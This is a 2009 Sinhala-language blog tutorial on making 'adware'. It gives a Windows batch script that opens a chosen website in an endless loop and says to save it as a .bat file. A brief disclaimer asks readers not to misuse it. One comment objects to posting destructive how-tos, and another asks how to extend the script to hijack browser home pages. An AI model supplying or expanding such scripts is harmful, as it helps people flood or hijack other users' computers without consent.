මුදිතගේ අඩවිය - යෞවනයේ ගවේෂණාත්මක අඩවිය.. අපේ කමින් හැදීවැඩී..
Banner created with MyBannerMaker.com

Friday, February 6, 2009

Adware එකක් හදමු..

මගේ කලින් ලිපියෙන් මම පරිගණකය shutdown කරන වෛරසයක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කලා. ඉතින් මම මේ ලිපියෙන් බලාපොරොත්තු වන්නේ Adware එකක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කරන්නයි.ඊට කලින් Adware කියන්නෙ මොනවද කියල කියන්නම්.

  • ඇත්තටම Adware එකක් කියන්නෙ කූට වෙළද උපක්‍රමයක් කීවොත් මං නිවැරදියි. මක්නිසාදයත් Adware එකක් යොදාගන්නේ තමන්ගේ website එක ප්‍රසිද්ද කරගැනීමේ අරමුණෙන් බැවිනි. Adware එකකින් කරනුයේ අපව දැනුවත්ව හෝ නොදැනුවත්ව අදාල website එකට සම්බන්ද කිරීමයි..
දැන් අපි බලමු Adware එකක් හදන්නෙ කොහොමද කියලා.

සැ::යු::

නමුත් මේවා හදපු පලියටම මෙම වෛරස අයුතු ලෙස ප්‍රයෝජනයට ගන්න එපා කියල මම ඔයාලගෙන් ඉල්ලා සිටිනවා. ඒ වගේම මෙම වෛරස පරීක්ෂා කිරීමේදී ආරක්ෂාවන ලෙසත්, එමගින් ඔබගේ පරිගණකයේ දෝෂ ඇතිවිය හැකි බවත් සලකන්න.

Adware නිර්මාණය ::

1 පියවර :: notepad එක open කරගන්න.

2 පියවර :: එහි පහත දැක්වෙන දෑ type කරන්න.

@echo off

:loop

start www.mywebsite.com

goto loop

www.mywebsite.com වෙනුවටද ඔබට කැමති website එකක් දමන්න.

3 පියවර :: ඉන්පසු මෙය name.bat ලෙස save කරන්න.

( Name වෙනුවටද ඔබට කැමති නමක් type කලහැක. නමුත් .bat අනිවාර්යයි.)

3 පියවර :: දැන් අපේ Adware එක නිර්මාණය කර අවසානයි...


2 අදහස්:

ශාකුන්තල | Shaakunthala said...

මේක ගැනත් කියන්න තියෙන්නෙ මම කලින් වයිරස් එක ගැන කිව්ව දේම තමයි.

---
පොඩි ඉල්ලීමක් කරනවා විනාශකාරී දේවල් කරන හැටි බ්ලොග් එකේ ලියන්න එපා කියලා. කරුණාකර වරදවා වටහාගන්න එපා. මේක කාරුණික ඉල්ලීමක්ම විතරයි. ඔයාගෙ බ්ලොග් එක ඔයාගෙ නිදහස.
මම එහෙම ඉල්ලීමක් කරන්න හේතු වුණේ බ්ලොග් බලන දෙපා සුනඛයොත් ඉන්න නිසා. වැරදි අය අතට වැරදි දේ ගියොත් වෙන්නෙ විනාශයක්.

Anonymous said...

machan,meken wenne ape site eka open wena eka witharay nee.

apita meka modify karanna barida firefox ekey,internet explorer ekey change karanna bari wenna ape site eka home page ekata add wena widiyata?

saliya liyanage